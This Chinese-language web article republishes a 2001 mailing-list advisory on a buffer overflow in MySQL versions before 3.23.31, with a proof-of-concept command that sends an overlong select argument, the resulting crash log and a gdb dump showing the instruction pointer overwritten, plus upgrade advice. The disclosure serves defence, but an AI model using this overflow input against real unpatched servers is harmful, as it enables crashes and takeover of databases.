-
您的位置:首页 → 技术开发 → 数据库安全 → MySQL3.23.31之前版本的安全漏洞
MySQL3.23.31之前版本的安全漏洞
时间:2004/12/2 1:56:00来源:本站整理作者:蓝点我要评论(0)
-
所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。
下面为最初发表于 MySQL 邮件列表的信件摘要。
==================================================
漏洞是由Jo?o Gouveia 于1月12日发现的:
步骤:
在第一个终端上启动 mysql:
spike:/var/mysql # /sbin/init.d/mysql start
在另外一个终端上输入:
jroberto@spike:~ > mysql -p -e ’select a.’`perl -e’printf("A"x130)’`’.b’
Enter password:
(没有反应?按^C退出)
在第一台终端上会显示:
spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
nohup
$ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
g "$@" >>$err_log 2>&1>
Number of processes running now: 0
mysqld restarted on Fri Jan 12 07:10:54 WET 2001
mysqld daemon ended
使用 gdb 显示结果如下:
(gdb) run
Starting program: /usr/sbin/mysqld
[New Thread 16897 (manager thread)]
[New Thread 16891 (initial thread)]
[New Thread 16898]
/usr/sbin/mysqld: ready for connections
[New Thread 16916]
[Switching to Thread 16916]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax 0x1 1
ecx 0x68 104
edx 0x8166947 135686471
ebx 0x41414141 1094795585
esp 0xbf5ff408 0xbf5ff408
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
其中的 eip 指示就是缓冲溢出了。
解决办法就是升级到 3.23.31。所以,各位如果还没有把数据库升级到最新版本,请赶快行动。
相关阅读
Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么
-
热门文章
没有查询到任何记录。
最新文章
没有查询到任何记录。
数据库安全技术研究如何看清楚SQL注入SQL SERVER数据库口令的脆弱性MySQL不安全临时文件建立漏洞
人气排行
MySQL3.23.31之前版本的安全漏洞网站入侵过程!如何看清楚SQL注入通过mysql入侵NT和win2000Mysql数据库的安全配置、实用技巧SQL数据库的一些攻击 SQL Server补丁安装常见问题SQL SERVER数据库口令的脆弱性
查看所有0条评论>>